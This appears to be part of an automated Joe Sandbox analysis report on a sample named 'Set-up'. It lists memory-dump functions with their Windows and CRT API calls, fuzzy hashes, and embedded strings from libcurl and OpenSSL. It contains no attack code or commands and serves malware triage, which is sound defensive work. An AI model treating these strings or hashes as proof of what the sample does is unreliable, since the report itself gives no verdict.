                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: mallocmemset
                                • String ID:
                                • API String ID: 2882185209-0
                                • Opcode ID: 7a1320aec0be5afe0250ada99235e3e90945cee864c8a1d642b926dc2b7fc6b0
                                • Instruction ID: 89fa357ee9b0e74aac5aa92ce0bd72b1355a37c39b0abe7e024625d51f11474f
                                • Opcode Fuzzy Hash: 7a1320aec0be5afe0250ada99235e3e90945cee864c8a1d642b926dc2b7fc6b0
                                • Instruction Fuzzy Hash: B6012D9579138227EA20DEE67C81F1B2B4C8BD2718F280439FD00E2342D655DC6543A2
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00633D71), ref: 006343F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 51af5512f16f358c3bed8b8062768f1cecd1d2656268f4aa5762761a995ad149
                                • Instruction ID: fb01149d4c917a7a8e3cb9c3c76f583cf9e0b99c39600053677a1d8d1e4307ca
                                • Opcode Fuzzy Hash: 51af5512f16f358c3bed8b8062768f1cecd1d2656268f4aa5762761a995ad149
                                • Instruction Fuzzy Hash: 5E0119B8A043008BDB44AFBAD4C152EB7E2EF55304F41486DE881CB306DA34EC90DBD2
                                APIs
                                • getsockname.WS2_32(?,?,00000080), ref: 001DAFD0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: getsockname
                                • String ID:
                                • API String ID: 3358416759-0
                                • Opcode ID: 90c7b788a46e4abaa7302873a0a771177beed00605fd7e2b21d0f737092e7a96
                                • Instruction ID: e037be3158e243bd4f4534e34d810bd595c9ec5a739841749df0d2b266e74ad1
                                • Opcode Fuzzy Hash: 90c7b788a46e4abaa7302873a0a771177beed00605fd7e2b21d0f737092e7a96
                                • Instruction Fuzzy Hash: 32116670808785D6EB268F18D8427E6B3F4EFD4329F109619F99942150F77659C5CBC2
                                APIs
                                • send.WS2_32(?,?,?,00000000), ref: 001DA97E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: send
                                • String ID:
                                • API String ID: 2809346765-0
                                • Opcode ID: e8003159bfe8e65c83d3647c7de960b8ad21e43ed07e2de1695984b0d1ff33f6
                                • Instruction ID: 3e54b779ff29c352427b625bd2f2b710a70659d6e3116c972ebda33f01e74194
                                • Opcode Fuzzy Hash: e8003159bfe8e65c83d3647c7de960b8ad21e43ed07e2de1695984b0d1ff33f6
                                • Instruction Fuzzy Hash: 28018F71B00710AFC614CF25DC45B56BBA5EF84721F0A865AFA982B361C331AC14CB91
                                APIs
                                • recvfrom.WS2_32(?,?,?,00000000,00001001,?), ref: 001DA90C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: recvfrom
                                • String ID:
                                • API String ID: 846543921-0
                                • Opcode ID: 7466356a821b3f8f00fa93c46f1efe70a0d3d35f5d8063260b2499afc019b3da
                                • Instruction ID: bcece4f90a179a233e1b0e0be75710f65eb48a4bb321668f5295927245a59e13
                                • Opcode Fuzzy Hash: 7466356a821b3f8f00fa93c46f1efe70a0d3d35f5d8063260b2499afc019b3da
                                • Instruction Fuzzy Hash: 41F01D75108358AFD2249F41DC48D6BBBEDEFC9758F05456DF958133119371AE10CA72
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: closesocket
                                • String ID:
                                • API String ID: 2781271927-0
                                • Opcode ID: f5ece8a9b0017ee89fa34b1c4927160624a8fb8910ab791c57f51d9eff60797a
                                • Instruction ID: 742e68d424fc360d0658e1236d55916bce8ab156fd7176e5cbf90af87df8a22a
                                • Opcode Fuzzy Hash: f5ece8a9b0017ee89fa34b1c4927160624a8fb8910ab791c57f51d9eff60797a
                                • Instruction Fuzzy Hash: 93E0EC34A0420197CE149A54C988A5B777B7FC0710F69CB68F42D8A655D73ADC46CA41
                                APIs
                                • ioctlsocket.WS2_32(?,8004667E), ref: 001767FB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: ioctlsocket
                                • String ID:
                                • API String ID: 3577187118-0
                                • Opcode ID: 1dbc005fae86c6036cfc1b667e524139399e2287a018f43c8f9c9c380c9c2d5c
                                • Instruction ID: 9ac2939d1716a6cfaddaf7e870397cdc54f2e5647d304898d18f448111ea0da6
                                • Opcode Fuzzy Hash: 1dbc005fae86c6036cfc1b667e524139399e2287a018f43c8f9c9c380c9c2d5c
                                • Instruction Fuzzy Hash: C7C012F5108200EFC7084B24D849A5F77E9EB48255F11481CB046C2150EB749460CF16
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,006343E5,?,?,?,?,?,00633D71), ref: 00638355
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: d8f7c5729608dcd68036b95792e4ea9a926db12f08da0882eeb3d581ea962f0c
                                • Instruction ID: 89bebc2d6d481f5702478f9c0c6128f05bc5279807607ae47618aea20e390ac8
                                • Opcode Fuzzy Hash: d8f7c5729608dcd68036b95792e4ea9a926db12f08da0882eeb3d581ea962f0c
                                • Instruction Fuzzy Hash: 60E0C0B46047008F9B20EE69C4C059BB7E5BE94B14F050A2DE8C687701DB35E904CBA2
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00112589), ref: 00633B45
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: malloc
                                • String ID:
                                • API String ID: 2803490479-0
                                • Opcode ID: 6e318683829a1f7a67aaffcea65a83e7731aa0fc6ad9bdf6b15bfa8e3202b569
                                • Instruction ID: 9ca2432662ccdc5b6a7f9a0203111ac755e0dd202827a467db8174585f767506
                                • Opcode Fuzzy Hash: 6e318683829a1f7a67aaffcea65a83e7731aa0fc6ad9bdf6b15bfa8e3202b569
                                • Instruction Fuzzy Hash: 2EF015B08013208FD7009F19D508B42BFE4BF45314F06829DD4881F3A2DBB9C644CBE1
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,006343F0,?,?,?,?,?,00633D71), ref: 00639021
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 34761678f78d0da677cb802dd2d401158160ce172d48f190059a3dc7a4052d5e
                                • Instruction ID: 6f4cb745901b6534dea14175a9a5a4a4ec6b227cb0f1afc8adc6d3db1b81ec55
                                • Opcode Fuzzy Hash: 34761678f78d0da677cb802dd2d401158160ce172d48f190059a3dc7a4052d5e
                                • Instruction Fuzzy Hash: 41D0A7719043044BCB007E6888C140A37947A65314FC006AEDD845B302D7395515C7D3
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,002C7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,002C40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002ECBD2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: bfb3341f09ba4ff69db34d5337b2ba120a6e880d5560880acd38e5e82a5c9f8d
                                • Instruction ID: 226bdfcf860679d71cba5d5b43b940f9baf88b2266a5acb4ad0ba7d42dede31e
                                • Opcode Fuzzy Hash: bfb3341f09ba4ff69db34d5337b2ba120a6e880d5560880acd38e5e82a5c9f8d
                                • Instruction Fuzzy Hash: CFB02B25440040C7D6010605F883C153103E241308BE0043CF101C04B0C2108C62D182
                                APIs
                                • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Unknown error), ref: 00186E74
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00186F8A
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00187184
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00187263
                                • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 001875B8
                                  • Part of subcall function 002DF870: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000800), ref: 002DF8AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy$memcmpmemsetstrcpystrlen
                                • String ID: Unable to load public key$ Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s$ SSL certificate issuer check ok (%s)$ SSL certificate verify ok.$ SSL certificate verify result: %s (%ld), continuing anyway.$ common name: %s (matched)$ expire date: %.*s$ issuer: %s$ start date: %.*s$ subject: %s$ subjectAltName does not match %s %s$ subjectAltName: host "%s" matched cert's "%s"$ subjectAltName: host "%s" matched cert's IP address!$%02x$%02x:$%lx$%s certificate:$%s/%s$/%s$: $<$BIO_new return NULL, OpenSSL error %s$BIO_new_mem_buf NULL, OpenSSL error %s$Cert$Could not find certificate ID in OCSP response$Could not get peer certificate chain$Error computing OCSP ID$Error getting peer certificate$Expire date$Invalid OCSP response$Invalid OCSP response status: %s (%d)$Issuer$No OCSP response received$No error$OCSP response has expired$OCSP response verification failed$OpenSSL$Proxy$Public Key Algorithm$RSA Public Key$Remove session ID again from cache$SSL certificate revocation reason: %s (%d)$SSL certificate status: %s (%d)$SSL certificate verify result: %s (%ld)$SSL: Certificate issuer check failed (%s)$SSL: Unable to open issuer cert (%s)$SSL: Unable to read issuer cert (%s)$SSL: certificate subject name '%s' does not match target hostname '%s'$SSL: could not get X509-issuer name$SSL: could not get peer certificate$SSL: illegal cert name field$SSL: no alternative certificate subject name matches target %s '%s'$SSL: public key does not match pinned public key$SSL: unable to obtain common name from peer certificate$Serial Number$Server$Signature$Signature Algorithm$Start date$Subject$Unknown error$Version$[NONE]$dsa$hostname$ipv4 address$ipv6 address$pqg$pub_key$rsa$unexpected ssl peer type: %d$vtls/openssl.c
                                • API String ID: 838718518-248801092
                                • Opcode ID: 2f8de73968a2b9b2579eb7e3163c196c1d42e33f1651ec2a67ec680c9bf98304
                                • Instruction ID: bfb3d54867168795d8e602674f1a16abc4d1dac45a3818128d2f810e412aeedf
                                • Opcode Fuzzy Hash: 2f8de73968a2b9b2579eb7e3163c196c1d42e33f1651ec2a67ec680c9bf98304
                                • Instruction Fuzzy Hash: 4A0307B5908340ABE721BA10EC42F7B7799AF91708F094428FD4D56283F775EA64CB93
                                APIs
                                • localeconv.MSVCRT ref: 0049E0B3
                                • localeconv.MSVCRT ref: 0049E0BE
                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0049E149
                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0049E179
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0049E1D8
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0049E1FA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0049E20F
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0049F886
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: free$isspacelocaleconv$_errno
                                • String ID: $d$nil)
                                • API String ID: 577766270-394766432
                                • Opcode ID: b30ea4267f07cbf7ee465e624fc707087f7ec34612eb9e44faeeff50eae18c2d
                                • Instruction ID: 9ca0fd3a4a5b0c1f9054b48cc9dbf0e048eff32178e96d49ce84698fd07b07c6
                                • Opcode Fuzzy Hash: b30ea4267f07cbf7ee465e624fc707087f7ec34612eb9e44faeeff50eae18c2d
                                • Instruction Fuzzy Hash: A3137E706083418FDB20CF29C08462BBBE1BF99314F14497EE9959B361D779EC49CB86
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$LIST$NLST$PORT$PRET$PRET %s$PRET RETR %s$PRET STOR %s$REST %d$RETR_PREQUOTE$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                • API String ID: 0-1921080684
                                • Opcode ID: 6821e164f81c7cbe51158a283be8719eb8a9fb95e1c5f63cec3da34024167d64
                                • Instruction ID: 5b2b8fbd56794c42e6c7de8418c3b60227e72ebec7873765c79f1d97e9a445e8
                                • Opcode Fuzzy Hash: 6821e164f81c7cbe51158a283be8719eb8a9fb95e1c5f63cec3da34024167d64
                                • Instruction Fuzzy Hash: 52521371A04300EBD7189F24DC45B7B7BE9AB94306F184829FDA5CB292E730DA49C792
                                APIs
                                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 0011E6F1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: fputc
                                • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                • API String ID: 1992160199-2555271450
                                • Opcode ID: b036fc5d1c04b80570863bf7aca382fa9e727900946385b45f38577becb8ab06
                                • Instruction ID: fce8c9ff585a8d5a74b13cd558a3e159d229a522aac9486af76ac8dd7722631a
                                • Opcode Fuzzy Hash: b036fc5d1c04b80570863bf7aca382fa9e727900946385b45f38577becb8ab06
                                • Instruction Fuzzy Hash: 7E829371A083419FD718CE19C8847ABBBE1AFC5724F158A3DF8A997291D730DC86CB52
                                APIs
                                  • Part of subcall function 0012D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,001201B1), ref: 0012D8E2
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 001252A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: CounterPerformanceQueryfflush
                                • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                • API String ID: 1125614567-122532811
                                • Opcode ID: 9158793e268dab79055c7e10f465c977d828f7f6069e6ef2d99feb3757a075c1
                                • Instruction ID: bc9eb9152f2325da0a53b5ace29209b8ce168e1683c88b68a1730ec4c622d3ca
                                • Opcode Fuzzy Hash: 9158793e268dab79055c7e10f465c977d828f7f6069e6ef2d99feb3757a075c1
                                • Instruction Fuzzy Hash: 55420771B08710AFD708DE28DC81B6BB7E6EFD4704F05892CF54D97291E775A8248B92
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000040), ref: 003A0374
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000080), ref: 003A0395
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008), ref: 003A049D
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000004), ref: 003A04E7
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?), ref: 003A055F
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000298,?,?), ref: 003A057A
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 003A0618
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,0000005C,?), ref: 003A06E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: @$MD5$SHA1$SHA2-224$SHA2-256$SHA2-384$SHA2-512
                                • API String ID: 1297977491-3776850024
                                • Opcode ID: 9bb44be9d4e6151a96c3f3d4e5f304d3ebed9c4c9f2be3c7431884db70757633
                                • Instruction ID: 59a2a8c10ab7568dce04ff459c8b97d4cb33b694eeb81c0be410d42908325e2a
                                • Opcode Fuzzy Hash: 9bb44be9d4e6151a96c3f3d4e5f304d3ebed9c4c9f2be3c7431884db70757633
                                • Instruction Fuzzy Hash: 7152A2719187818BD715CF28D841BABB7E4EFDA348F048A2DF9C893252E775D904CB92
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 002EE28D
                                • FindNextFileW.KERNEL32(?,00000000), ref: 002EE2BB
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,0000000100000001,?,00000100,00000000,00000000,?,?), ref: 002EE30A
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 002EE3C7
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 002EE3DD
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000354), ref: 002EE3F8
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000), ref: 002EE41A
                                • MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 002EE44E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 002EE563
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 002EE571
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide_errno$FileFindNextcallocfreestrlen
                                • String ID:
                                • API String ID: 1393009926-0
                                • Opcode ID: e6d80a3b3afc340fe8fd6b125e2467148ff9c9ea7b876429c30fbf6381220568
                                • Instruction ID: 082abbf6b9f57c5e76324f94a0d02b820f0a65b28230ce799a8300929b0b7b75
                                • Opcode Fuzzy Hash: e6d80a3b3afc340fe8fd6b125e2467148ff9c9ea7b876429c30fbf6381220568
                                • Instruction Fuzzy Hash: FD914730160B829FDB21CF39CC45B76BBA5FF85314F594669E9558B2E2E730E860CB50
                                APIs
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 001CCC95
                                  • Part of subcall function 001CCDF0: memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 001CCEC8
                                  • Part of subcall function 001CCDF0: SetLastError.KERNEL32(00000002,00000000,001CCC27,00000004), ref: 001CD109
                                • SetLastError.KERNEL32(00000002), ref: 001CCDD0
                                Similarity
                                • API ID: ErrorLastmemchr
                                • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                • API String ID: 2208448350-3285806060
                                • Opcode ID: 9f3e890277f306e1f863931f5332e91cf730e1a7b30285e6e4f2fef1bee738ab
                                • Instruction ID: d0c1862bb7d8f1a1457e8eb264385af937cc44b63a82de7d5459314b1d4363dc
                                • Opcode Fuzzy Hash: 9f3e890277f306e1f863931f5332e91cf730e1a7b30285e6e4f2fef1bee738ab
                                • Instruction Fuzzy Hash: B6D1D7B2A083058BD7249E68C845B7ABBD1AFA1344F15493DF8CE97281EB74DD84D7C2
                                Similarity
                                • API ID:
                                • String ID: %-18s$%5ld:d=%-2d hl=%ld l=%4ld %s$%5ld:d=%-2d hl=%ld l=inf %s$(unknown)$<ASN1 %d>$BAD RECURSION DEPTH$Error in encoding$appl [ %d ]$cons: $cont [ %d ]$length is greater than %ld$prim: $priv [ %d ]
                                • API String ID: 0-2568808753
                                • Opcode ID: ee34a575e83f72ee958e210088de8f20646e6c72a3434c98e6efcb757933a3c0
                                • Instruction ID: 442b0a9993b5af0e59ce6ae8566290d18ed872f7ec74969414974fcb4f35858d
                                • Opcode Fuzzy Hash: ee34a575e83f72ee958e210088de8f20646e6c72a3434c98e6efcb757933a3c0
                                • Instruction Fuzzy Hash: C4E1E379529316AFD720BE14DC41B2FB7E5AF84744F04482DF989932C2E7B5E9208B83
                                Similarity
                                • API ID:
                                • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                • API String ID: 0-2555271450
                                • Opcode ID: 118d4a983629975567ac8f091ad59eef4d5993e28c444ceffc2f28f9828a17b7
                                • Instruction ID: 61b1af21023b2429286448d27dce027b6672cd2a07661530c0491330533e275e
                                • Opcode Fuzzy Hash: 118d4a983629975567ac8f091ad59eef4d5993e28c444ceffc2f28f9828a17b7
                                • Instruction Fuzzy Hash: 81C26A7160C3418FCB18CF29C4D06AAB7E2AFD9314F15893DE89A9B351D734ED858B82
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 004806A3
                                Similarity
                                • API ID: memcpy
                                • String ID: $
                                • API String ID: 3510742995-227171996
                                • Opcode ID: a06d0727aae60a62495961a5ef04ba1441a8261550d2cb222952530f38ea2ff4
                                • Instruction ID: 1cf6aa62d0e99fcffb4cc3818bf5c532e84f01bd31d3131e60659121ac1e5e78
                                • Opcode Fuzzy Hash: a06d0727aae60a62495961a5ef04ba1441a8261550d2cb222952530f38ea2ff4
                                • Instruction Fuzzy Hash: 2DD2A072A087558FC724DF28C88026EF7E1FFC9304F158A2EE99997351D774A846CB86
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00358A66
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00358A88
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000010), ref: 00358B45
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00358B59
                                Strings
                                • providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c, xrefs: 00358A42, 00358F13
                                Similarity
                                • API ID: memcpymemset
                                • String ID: providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c
                                • API String ID: 1297977491-3184136495
                                • Opcode ID: c433adae97f61928431c2441fa313cc9b15ee3b08b68b0e33cd3750a7c5d1630
                                • Instruction ID: 089a079f5c2d5c4f2312f55a3c1d5ce2164cb1f6c6d5e97c6b593f70bd3d1ab7
                                • Opcode Fuzzy Hash: c433adae97f61928431c2441fa313cc9b15ee3b08b68b0e33cd3750a7c5d1630
                                • Instruction Fuzzy Hash: C122E2725087419FD712CF24C881BABBBE4FF96345F084A1DF89597292DB30E949CB92
                                APIs
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 004947A3
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 004947C1
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00494800
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00494D16
                                Similarity
                                • API ID: _strdupmemcpystrchrstrlen
                                • String ID: H$xn--
                                • API String ID: 1602650251-4022323365
                                • Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                                • Instruction ID: 2a8d5e537dac38698d2a61e80d561e487182b3de5b8e376fe9ddce112f0ef8c2
                                • Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                                • Instruction Fuzzy Hash: E3E118716087154FDB18DE28D8C0A2ABBD2ABC5314F198B3ED99687385E778DC07874A
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0041C090
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000102), ref: 0041C0BE
                                Strings
                                • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./, xrefs: 0041C0D2, 0041C266
                                • assertion failed: ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 0041C433
                                • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 0041C0CD, 0041C26B
                                • crypto/evp/encode.c, xrefs: 0041C42E
                                Similarity
                                • API ID: memcpy
                                • String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)$crypto/evp/encode.c
                                • API String ID: 3510742995-2458911571
                                • Opcode ID: 0faad8bc0254b78253eddf97c928a27003f21047b0269de883dcd4d22cc30bc2
                                • Instruction ID: 2b92d99943091aae3d8557eca7fad481542381deca961da924680b681a7c7489
                                • Opcode Fuzzy Hash: 0faad8bc0254b78253eddf97c928a27003f21047b0269de883dcd4d22cc30bc2
                                • Instruction Fuzzy Hash: 5CC10A7560C3958FC715CF58C89076ABBE1AF96304F0989AEF8D58B382D338E945CB52
                                Similarity
                                • API ID:
                                • String ID: @$@$@$ssl/quic/quic_txp.c
                                • API String ID: 0-600063881
                                • Opcode ID: 77629711454b6b7c94628850b19d2dea4101470affd80c82c5c567196464e062
                                • Instruction ID: 8de2ab82da86fc06850ac0260fbb543f6e7ca166f748db9a50f7ac6d5bb945c4
                                • Opcode Fuzzy Hash: 77629711454b6b7c94628850b19d2dea4101470affd80c82c5c567196464e062
                                • Instruction Fuzzy Hash: E353D171A183428FD724DF28C881BAAB7E5BF84314F14892DE89D97391E771E954CF82
                                Similarity
                                • API ID:
                                • String ID: default$login$macdef$machine$netrc.c$password
                                • API String ID: 0-1043775505
